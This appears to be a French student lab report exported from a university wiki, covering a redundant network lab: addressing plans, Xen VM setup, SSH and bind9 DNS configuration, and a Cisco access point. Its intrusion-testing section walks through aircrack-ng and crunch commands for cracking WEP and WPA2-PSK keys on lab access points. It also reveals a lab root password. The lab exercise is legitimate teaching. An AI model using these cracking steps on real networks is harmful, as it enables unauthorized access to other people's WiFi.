Ecouter les beacon WiFi sur cette carte réseau :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
De cette écoute , nous choisissons l'AP nommé '''cracotte09'''  avec le BSSID  : '''04:DA:D2:9C:50:58'''&lt;br /&gt;
&lt;br /&gt;
Nous simulons l'authentification sur cet AP :&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -9 -e cracotte09 -a 04:DA:D2:9C:50:58' wlan0mon&lt;br /&gt;
&lt;br /&gt;
 -9 : mode injection&lt;br /&gt;
 -e cracotte09 : nom du point d'accès&lt;br /&gt;
 -a 04:DA:D2:9C:50:58 : bssid du point d'accès&lt;br /&gt;
&lt;br /&gt;
Nous récupérons ensuite un nombre de frames conséquent émis par cet access point :&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -1 0 -e cracotte09 -a 04:DA:D2:9C:50:58 -h 40:A5:EF:01:28:D0 wlan0mon&lt;br /&gt;
&lt;br /&gt;
-1 : mode &amp;quot;fake authentification&amp;quot;&lt;br /&gt;
0 : délai entre les demandes d'authentifications&lt;br /&gt;
-h 40:A5:EF:01:27:D0 : bssid de l'interface réseau&lt;br /&gt;
&lt;br /&gt;
Résultat :&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Key_name.png|center|thumb|500px|Branchements duu eeee PC]]&lt;br /&gt;
&lt;br /&gt;
'''5.3 Cassage de clef WPA2-PSK d’un point d’accès WiFi'''&lt;br /&gt;
&lt;br /&gt;
Maintenant nous choisissions kracotte5 comme victime à l'aide du groupe de commande précédentes, c'est à dire :&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f68cb 4&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
Une fois que nous avons trouvé la victime (kracotte 5 ainsi que son BSSID), nous tentons de récupérer un handshake provenant de ce point d'accès et nous le stockons dans un fichier psk :&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 4 --bssid 44:AD:D9:5F:87:04 -w psk wlan0mon&lt;br /&gt;
&lt;br /&gt;
Nous installons ensuite un utilitaire pour générer le dictionnaire de clé WPA2-PSK qui sera utilisé par aircrack-ng pour se connecter au point d'accès wifi kracotte5 :&lt;br /&gt;
&lt;br /&gt;
 apt-get install crunch&lt;br /&gt;
&lt;br /&gt;
Pour installer cette utilitaire nous pouvons relier l'eeePc au réseau de l'école à l'aide du deuxième câble ethernet disponnible à l'arrière des zabeth :&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:branchement_eee_pc.png|center|thumb|500px|Branchements duu eeee PC]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Une fois installé nous pouvons générer le dictionnaire :&lt;br /&gt;
 crunch 8 8 0123456789 -o password.lst&lt;br /&gt;
&lt;br /&gt;
Une fois généré, nous pouvons lancer la précédure de crackage (qui peut être très longue) :&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -w password.lst -b 44:AD:D9:5F:87:04 psk*.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Crackage_wpa.png|center|thumb|500px|Crackage WPA]]&lt;br /&gt;
&lt;br /&gt;
= Configuration point d'accès WiFI =&lt;br /&gt;
&lt;br /&gt;
[En cours]&lt;br /&gt;
Configuration du point d'accès WiFi E304 (primaire) :&lt;br /&gt;
&lt;br /&gt;
Installation de minicom sur macos : &lt;br /&gt;
 brew install minicom&lt;br /&gt;
&lt;br /&gt;
Récupération du nom de l'access point connecté en USB (mac Os):&lt;br /&gt;
 ls /dev/cu*&lt;br /&gt;
&lt;br /&gt;
On obtient (en branchant et débranchant on identifie l'appareil qui apparait): &lt;br /&gt;
 /dev/cu.usbserial-FTB3OOLY&lt;br /&gt;
&lt;br /&gt;
Configuration du routeur WiFi :&lt;br /&gt;
 minicom -os&lt;br /&gt;
&lt;br /&gt;
Configuration à ajouter :&lt;br /&gt;
 Nom de device : /dev/cu.usbserial-FTB3OOLY&lt;br /&gt;
 Baudrate : 9600 8N1&lt;br /&gt;
&lt;br /&gt;
Configuration du point d'accès WiFi :&lt;br /&gt;
Source : https://www.cisco.com/en/US/docs/routers/access/800/850/software/configuration/guide/wireless.html&lt;br /&gt;
&lt;br /&gt;
 enable =&amp;gt; Passer en route (mdp : Cisco si par défaut)&lt;br /&gt;
 int sh =&amp;gt; pour trouver le nom de l'interface radio principale&lt;br /&gt;
 conf t =&amp;gt; Passer en mode configuration&lt;br /&gt;
 int dot11radio0 =&amp;gt; On se place sur la première interface radio de l'AP&lt;br /&gt;
 broadcast-key vlan 42 change 45&lt;br /&gt;
 broadcast-key vlan 1 change 45 =&amp;gt; Rafraichissement de la clé d'encryption toutes les 45 secondes &lt;br /&gt;
 ssid e304 =&amp;gt; Condiguration du SSID&lt;/div&gt;</summary>
		<author><name>Rlassery</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=57058</id>
		<title>TP sysres IMA5 2021/2022 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5_2021/2022_G2&amp;diff=57058"/>
				<updated>2021-12-13T17:06:09Z</updated>
		
		<summary type="html">&lt;p&gt;Rlassery : /* 3. Configuration des Machines Virtuelles */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Wiki compte-rendu de TP PRA - Aviran Tetia &amp;amp; Robin Lasserye&lt;br /&gt;
&lt;br /&gt;
= Sujet =&lt;br /&gt;
&lt;br /&gt;
L'objectif de ce TP est de créer un réseau redondé &lt;br /&gt;
Lien : https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/&lt;br /&gt;
&lt;br /&gt;
= 1. Configuration du Réseau physique = &lt;br /&gt;
&lt;br /&gt;
[insérer image]&lt;br /&gt;
&lt;br /&gt;
=Plan d'adressage=&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! VLAN !!  Réseau IPv4 !! Réseau IPv6 !! @IPv4 virtuelle !! IPv4 6509E (E304) !! IPv4 C9200 (E306) !! IPv4 ISR4331 (SR52) !! SSID !! VM &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 10 || 10.00.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.00.0.250 || 10.00.0.251 || 10.00.0.252 || 10.00.0.253 || Jonquille || Kronenbourg&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 11 || 10.01.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.01.0.250 || 10.01.0.251 || 10.01.0.252 || 10.01.0.253 || Marguerite || Paixdieu&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 02 || 10.02.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.02.0.250 || 10.02.0.251 || 10.02.0.252 || 10.02.0.253 || Pensee || Kasteel&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 03 || 10.03.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.04.0.250 || 10.03.0.251 || 10.03.0.252 || 10.03.0.253 || Lavende || Karmeliet&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 04 || 10.04.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.03.0.250 || 10.04.0.251 || 10.04.0.252 || 10.04.0.253 || Tulipe || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 05 || 10.05.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.05.0.250 || 10.05.0.251 || 10.05.0.252 || 10.05.0.253 || Rose || Bellerose&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 06 || 10.06.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.06.0.250 || 10.06.0.251 || 10.06.0.252 || 10.06.0.253 || Orchidee || Anosteke&lt;br /&gt;
|- &lt;br /&gt;
| Mel / Theo || 07 || 10.07.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.07.0.250 || 10.07.0.251 || 10.07.0.252 || 10.07.0.253 || Tournesol || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 08 || 10.08.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.08.0.250 || 10.08.0.251 || 10.08.0.252 || 10.08.0.253 || Lys || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 09 || 10.09.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.09.0.250 || 10.09.0.251 || 10.09.0.252 || 10.09.0.253 || Pissenlit || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 110 || 10.10.0.0/16 || 2001:7A8:116E:60B0::0/64 || 10.10.0.250 || 10.10.0.251 || 10.10.0.252 || 10.10.0.253 || Coquelicot || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Table du VLAN 42&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! @IPv4 MV !! @IPv6 MV (auto) &lt;br /&gt;
|- &lt;br /&gt;
| Andrei / Julien || 193.48.57.176 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Robin / Aviran || 193.48.57.177 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Axel / Guillaume || 193.48.57.178 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Selim / Raphael || 193.48.57.179 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Helene / Camille || 193.48.57.180 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Boris / Louis || 193.48.57.181 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Johnny / Arthur || 193.48.57.182 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Mel / Theo || 193.48.57.183 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Khalil / Alvare || 193.48.57.184 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| SOuleyman / Enoch || 193.48.57.185 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
| Clement || 193.48.57.186 || &amp;amp;nbsp;&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Note : &lt;br /&gt;
&lt;br /&gt;
'''à compléter '''&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Entité !! Élève !! Domaine !! 193.48.57.176/28 !! 10.60.0.0/16 !! 2001:660:4401:60B0::/60 !! 2001:7A8:116E:60B0::/60 !! VLAN !! VLAN WIFI !! N° VRRP !! SSID n°1 !! SSID n°2&lt;br /&gt;
|-&lt;br /&gt;
| ROUTEUR E304&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.187&lt;br /&gt;
| &lt;br /&gt;
| :: :F0&lt;br /&gt;
| :: :F0&lt;br /&gt;
| 10.NN.00.250&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR E306&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.188&lt;br /&gt;
| &lt;br /&gt;
| :: :F1&lt;br /&gt;
| :: :F1&lt;br /&gt;
| 10.NN.00.251&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR SR52&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.189&lt;br /&gt;
| &lt;br /&gt;
| :: :F2&lt;br /&gt;
| :: :F2&lt;br /&gt;
| 10.NN.00.252&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| ROUTEUR FLOTTANTE&lt;br /&gt;
| &lt;br /&gt;
| 193.48.57.190&lt;br /&gt;
| &lt;br /&gt;
| :: :F3&lt;br /&gt;
| :: :F3&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO 531 INTERCO-SA&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.40/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| 10.NN.00.253&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E304&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.42/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| fe80::/10    ::1&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO E306&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.43/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| fe80::/10    ::2&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|- &lt;br /&gt;
| Vlan INTERCO SR53&lt;br /&gt;
| &lt;br /&gt;
| 192.168.222.44/29&lt;br /&gt;
| &lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| fe80::/10    ::3&lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
| &lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv4 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv4 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
|&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
* Plan d'adressage IPv6 :&lt;br /&gt;
{| class=&amp;quot;plan_addr&amp;quot;&lt;br /&gt;
! VLAN !! Nom !! Réseau IPv6 !! Cisco 6509-E !! Cisco 9200 !! Cisco ISR 4331 !! Routeur plateforme maths/info !! PA Wifi n°1 !! PA Wifi n°2&lt;br /&gt;
|-&lt;br /&gt;
&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= 3. Configuration des Machines Virtuelles =&lt;br /&gt;
&lt;br /&gt;
On se connecte en ssh à capbreton :&lt;br /&gt;
 ssh root@capbreton&lt;br /&gt;
&lt;br /&gt;
Nous incluons le proxy de polytech dans nos variables d'environnement:&lt;br /&gt;
 export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
&lt;br /&gt;
Nous procédons ensuite la création de la machine virtuelle, pour cela nous allons saisir les informations suivantes: le nom de la machine (ici Paixdieu), l'adresse IP (--ip) qui nous a été fourni durant la répartition des IP, l'adresse IP du routeur de la salle E306  (--gateway) et le masque du réseau correspondant à un /28 (--netmask) (le /27 étant divisé entre les deux classes), l'emplacement de nos disques virtuels (--dir), le mot de passe de la machine virtuel (---password) puis le type de distribution souhaitée, ici nous avons choisi Debian Bullseye (--dist).&lt;br /&gt;
 xen-create-image --hostname=Paixdieu --ip=193.48.57.177 --gateway=193.48.57.188 --netmask=255.255.255.240 --dir=/usr/local/xen --password=glopglopglop --dist=bullseye&lt;br /&gt;
&lt;br /&gt;
Ensuite, nous avons créé deux LV, chacun de 10 Go sur le groupe de volume de stockage:&lt;br /&gt;
 lvcreate -L10G -n Paixdieu1 storage&lt;br /&gt;
 lvcreate -L10G -n Paixdieu2 storage&lt;br /&gt;
&lt;br /&gt;
Puis nous les avons formatés au format ext4 de la manière suivante:&lt;br /&gt;
 mkfs.ext4 /dev/storage/Paixdieu1&lt;br /&gt;
 mkfs.ext4 /dev/storage/Paixdieu2&lt;br /&gt;
&lt;br /&gt;
nous modifions ensuite notre fichier &amp;quot;/etc/xen/Paixdieu.cfg&amp;quot; pour préciser l'ajout les volumes logiques Paixdieu1 et Paixdieu2, de plus on ajoute le bridge IMA5sc dans la fonction vif.&lt;br /&gt;
Pour cela on ajoute les lignes suivantes:&lt;br /&gt;
 #&lt;br /&gt;
 #  Disk device(s).&lt;br /&gt;
 #&lt;br /&gt;
 root        = '/dev/xvda2 ro'&lt;br /&gt;
 disk        = [&lt;br /&gt;
                  'file:/usr/local/xen/domains/Paixdieu/disk.img,xvda2,w',&lt;br /&gt;
                  'file:/usr/local/xen/domains/Paixdieu/swap.img,xvda1,w',&lt;br /&gt;
  		  ''''phy:/dev/storage/Paixdieu1,xvda3,w','''&lt;br /&gt;
  		  ''''phy:/dev/storage/Paixdieu2,xvda4,w''''&lt;br /&gt;
              ]&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Physical volumes&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Hostname&lt;br /&gt;
 #&lt;br /&gt;
 name        = 'Paixdieu'&lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 #  Networking&lt;br /&gt;
 #&lt;br /&gt;
 vif         = [ 'ip=193.48.57.177 ,mac=00:16:3E:95:13:AE ,'''bridge=IMA5sc'''' ]&lt;br /&gt;
&lt;br /&gt;
Nous lancons la machine virtuelle:&lt;br /&gt;
 xl create -c /etc/xen/Paixdieu.cfg&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons les répertoires liés à xvda3 et vxda4 pour y placer /home et /var:&lt;br /&gt;
 mkdir /mnt/xvda3&lt;br /&gt;
 mkdir /mnt/xvda4&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Nous y déplaçons le répertoire /var/ dans xvda4:&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
Pour monter les disques, nous modifions les lignes suivantes dans /etc/fstab:&lt;br /&gt;
 proc            /proc           proc    defaults        0       0&lt;br /&gt;
 devpts          /dev/pts        devpts  rw,noexec,nosuid,gid=5,mode=620 0  0&lt;br /&gt;
 /dev/xvda1 none swap sw 0 0&lt;br /&gt;
 /dev/xvda2 / ext4 noatime,nodiratime,errors=remount-ro 0 1&lt;br /&gt;
 '''/dev/xvda3 /home ext4 defaults 0 2'''&lt;br /&gt;
 '''/dev/xvda4 /var ext4 defaults 0 2'''&lt;br /&gt;
&lt;br /&gt;
Puis nous lancons la commande de montage:&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
Nous obtenons les partitions suivantes:&lt;br /&gt;
 '''lsblk'''&lt;br /&gt;
 &lt;br /&gt;
 NAME  MAJ:MIN RM  SIZE RO TYPE MOUNTPOINT&lt;br /&gt;
 xvda1 202:1    0  512M  0 disk [SWAP]&lt;br /&gt;
 xvda2 202:2    0    4G  0 disk /&lt;br /&gt;
 '''xvda3 202:3 0 10G 0 disk /home'''&lt;br /&gt;
 '''xvda4 202:4 0 10G 0 disk /var'''&lt;br /&gt;
&lt;br /&gt;
Pour finir nous activons l'IPv6 dans l'interface en ajoutant les lignes suivantes dans /etc/network/interfaces:&lt;br /&gt;
 # This file describes the network interfaces available on your system&lt;br /&gt;
 # and how to activate them. For more information, see interfaces(5).&lt;br /&gt;
  &lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
 auto lo&lt;br /&gt;
 iface lo inet loopback&lt;br /&gt;
 &lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.177&lt;br /&gt;
 gateway 193.48.57.190&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 '''iface eth0 inet6 auto''' &lt;br /&gt;
 &lt;br /&gt;
 # post-up  ethtool -K eth0 tx off&lt;br /&gt;
 &lt;br /&gt;
 #&lt;br /&gt;
 # The commented out line above will disable TCP checksumming which&lt;br /&gt;
 # might resolve problems for some users.  It is disabled by default&lt;br /&gt;
&lt;br /&gt;
Nous effectuons les commandes suivantes pour appliquer les changements:&lt;br /&gt;
 systemctl restart networking&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
Et nous obtenons les résultats comme ça:&lt;br /&gt;
 1: lo: &amp;lt;LOOPBACK,UP,LOWER_UP&amp;gt; mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000&lt;br /&gt;
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00&lt;br /&gt;
    inet 127.0.0.1/8 scope host lo&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
    inet6 ::1/128 scope host &lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
 2: eth0: &amp;lt;BROADCAST,MULTICAST,UP,LOWER_UP&amp;gt; mtu 1500 qdisc pfifo_fast state UP group default qlen 1000&lt;br /&gt;
    link/ether 00:16:3e:95:13:ae brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
    inet 193.48.57.177/28 brd 193.48.57.191 scope global eth0&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
    inet6 2001:7a8:116e:60b0:216:3eff:fe95:13ae/64 scope global dynamic mngtmpaddr &lt;br /&gt;
       valid_lft 2591995sec preferred_lft 604795sec&lt;br /&gt;
    inet6 fe80::216:3eff:fe95:13ae/64 scope link &lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
&lt;br /&gt;
Puis nous quittons la VM avec '''CTRL + ['''&lt;br /&gt;
&lt;br /&gt;
Pour y retourner:&lt;br /&gt;
 xen console Paixdieu&lt;br /&gt;
&lt;br /&gt;
Pour retourner sur sa machine virtuelle, il faut : &lt;br /&gt;
&lt;br /&gt;
- retourner sur capbreton&lt;br /&gt;
 ssh root@capbreton&lt;br /&gt;
- Relancer la VM (login : root | password : glopglopglop):&lt;br /&gt;
 xl create -c /etc/xen/Paixdieu.cfg&lt;br /&gt;
&lt;br /&gt;
Nous avons configuré la résolution de noms dans /etc/network/interfaces, en ajoutons la ligne suivante :&lt;br /&gt;
 # This file describes the network interfaces available on your system&lt;br /&gt;
 # and how to activate them. For more information, see interfaces(5).&lt;br /&gt;
  &lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
 auto lo&lt;br /&gt;
 iface lo inet loopback&lt;br /&gt;
 &lt;br /&gt;
 # The primary network interface&lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.177&lt;br /&gt;
 gateway 193.48.57.190&lt;br /&gt;
 netmask 255.255.255.240&lt;br /&gt;
 '''dns-nameservers 8.8.8.8 8.8.4.4'''&lt;br /&gt;
 iface eth0 inet6 auto&lt;br /&gt;
&lt;br /&gt;
Puis nous avons vérifié son fonctionnement à l'aide d'un :&lt;br /&gt;
 ping www.google.com&lt;br /&gt;
 ...&lt;br /&gt;
 --- www.google.com ping statistics ---&lt;br /&gt;
 5 packets transmitted, 5 received, 0% packet loss, time 4005ms&lt;br /&gt;
&lt;br /&gt;
Configuration du SSH &lt;br /&gt;
&lt;br /&gt;
Dans /etc/ssh/sshd_config, ajout des lignes :&lt;br /&gt;
 Port 2223&lt;br /&gt;
 PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Puis :&lt;br /&gt;
 &amp;gt; systemctl restart ssh&lt;br /&gt;
 &amp;gt; systemctl status ssh&lt;br /&gt;
 ssh.service - OpenBSD Secure Shell server&lt;br /&gt;
     Loaded: loaded (/lib/systemd/system/ssh.service; enabled; vendor preset: e&amp;gt;&lt;br /&gt;
     Active: active (running) since Mon 2021-11-29 14:47:49 UTC; 2s ago&lt;br /&gt;
       Docs: man:sshd(8)&lt;br /&gt;
             man:sshd_config(5)&lt;br /&gt;
    Process: 3679 ExecStartPre=/usr/sbin/sshd -t (code=exited, status=0/SUCCESS)&lt;br /&gt;
   Main PID: 3680 (sshd)&lt;br /&gt;
      Tasks: 1 (limit: 230)&lt;br /&gt;
     Memory: 1.3M&lt;br /&gt;
        CPU: 21ms&lt;br /&gt;
     CGroup: /system.slice/ssh.service&lt;br /&gt;
             `-3680 sshd: /usr/sbin/sshd -D [listener] 0 of 10-100 startups&lt;br /&gt;
&lt;br /&gt;
Puis nous testons le SSH depuis le terminal de la Zabeth :&lt;br /&gt;
 &amp;gt; ssh root@193.48.57.177 -p 2223&lt;br /&gt;
 password : glopglopglop&lt;br /&gt;
&lt;br /&gt;
Nous arrivons à nous connecter, la configuration du SSh est donc un succès.&lt;br /&gt;
&lt;br /&gt;
Configuration du DNS :&lt;br /&gt;
&lt;br /&gt;
On a installé le package bind9 :&lt;br /&gt;
 &amp;gt;apt install bind9&lt;br /&gt;
&lt;br /&gt;
Sur le site gandit.net, nous avons modifié : &lt;br /&gt;
&lt;br /&gt;
Fenêtre Glue Records : ns1.paixdieu.site | 193.48.57.177&lt;br /&gt;
&lt;br /&gt;
Fenêtre Serveurs de noms :&lt;br /&gt;
&lt;br /&gt;
DNS Primaire : ns1.paixdieu.site | DNS Secondaire : ns6.gandi.net&lt;br /&gt;
&lt;br /&gt;
Dans le fichier /etc/resolv.conf, ajout de la ligne :&lt;br /&gt;
 nameserver 127.0.0.1&lt;br /&gt;
Afin de configurer le DNS par defaut.&lt;br /&gt;
&lt;br /&gt;
Puis nous passons à la configuration du DNS primaire :&lt;br /&gt;
On ajoute donc une zone lié à notre domaine paixdieu.site de type master et le chemin de son fichier de configuration et on permet les transferts d'informations avec le DNS secondaire ns6.gandi.net.&lt;br /&gt;
&lt;br /&gt;
On ajoute donc les lignes suivantes dans /etc/bind/named.conf.site:&lt;br /&gt;
 &amp;gt;vim /etc/bind/named.conf.site&lt;br /&gt;
&lt;br /&gt;
 acl &amp;quot;allowed_to_transfer&amp;quot; {&lt;br /&gt;
   193.48.57.0/24 ;&lt;br /&gt;
 };&lt;br /&gt;
 &lt;br /&gt;
 zone &amp;quot;paixdieu.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/db.paixdieu.site&amp;quot;;&lt;br /&gt;
         allow-transfer {217.70.177.40; };&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous configurons la zone paixdieu.site, pour cela on ajoute les ns.&lt;br /&gt;
On ajoute les lignes suivantes dans /etc/bind/db.paixdieu.site:&lt;br /&gt;
 &amp;gt;vim /etc/bind/db.paixdieu.site&lt;br /&gt;
 @       IN      SOA     ns1.paixdieu.site. postmaster.paixdieu.site. (&lt;br /&gt;
                              4         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.paixdieu.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 ns1     IN      A       193.48.57.177&lt;br /&gt;
 www     IN      A       193.48.57.177&lt;br /&gt;
&lt;br /&gt;
Pour tester le bon fonctionnement du serveur DNS, nous utilisons la commande :&lt;br /&gt;
&lt;br /&gt;
 &amp;gt;host -t any paixdieu.site localhost&lt;br /&gt;
&lt;br /&gt;
Résultat, cela fonctionne bien :&lt;br /&gt;
&lt;br /&gt;
 Using domain server:&lt;br /&gt;
 Name: localhost&lt;br /&gt;
 Address: 127.0.0.1#53&lt;br /&gt;
 Aliases: &lt;br /&gt;
 paixdieu.site has SOA record ns1.paixdieu.site. postmaster.paixdieu.site. 4 604800 86400 2419200 604800&lt;br /&gt;
 paixdieu.site name server ns6.gandi.net.&lt;br /&gt;
 paixdieu.site name server ns1.paixdieu.site.&lt;br /&gt;
&lt;br /&gt;
= 4. Architecture réseau =&lt;br /&gt;
&lt;br /&gt;
== L'architecture générale ==&lt;br /&gt;
[[Fichier:Pra diagrams.png]]&lt;br /&gt;
&lt;br /&gt;
== Les réseaux virtuels ==&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv4) ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Le routage du site (IPv6) ==&lt;br /&gt;
[insérer résumé]&lt;br /&gt;
&lt;br /&gt;
== Tests d'intrusion ==&lt;br /&gt;
'''5.2 Cassage de clef WEP d’un point d’accès WiFi'''&lt;br /&gt;
&lt;br /&gt;
Pendant que l'infrastructure réseau était en train d'être configurée, nous avons testé de casser une clé wep.&lt;br /&gt;
&lt;br /&gt;
Commandes réalisées sur un eeePC sous Linux :&lt;br /&gt;
&lt;br /&gt;
Récupération du nom de l'interface réseau WiFi du eeePC:&lt;br /&gt;
&lt;br /&gt;
 ip a&lt;br /&gt;
&lt;br /&gt;
On trouve : '''wlx40a5ef0f68cb'''&lt;br /&gt;
&lt;br /&gt;
Mettre la carte réseau WiFi en mode monitor sur le channel 4:&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f68cb 4&lt;br /&gt;
&lt;br /&gt;
Après cette étape, il est possible que la carte réseau soit renommée par airmon-ng en wlan0mon.&lt;br /&gt;
&lt;br /&gt;
Vérification que celle-ci est bien en mode monitor :&lt;br /&gt;
&lt;br /&gt;
 iwconfig&lt;br /&gt;
&lt;br /&gt;
Ecouter les beacon WiFi sur cette carte réseau :&lt;br /&gt;
&lt;br /&gt;
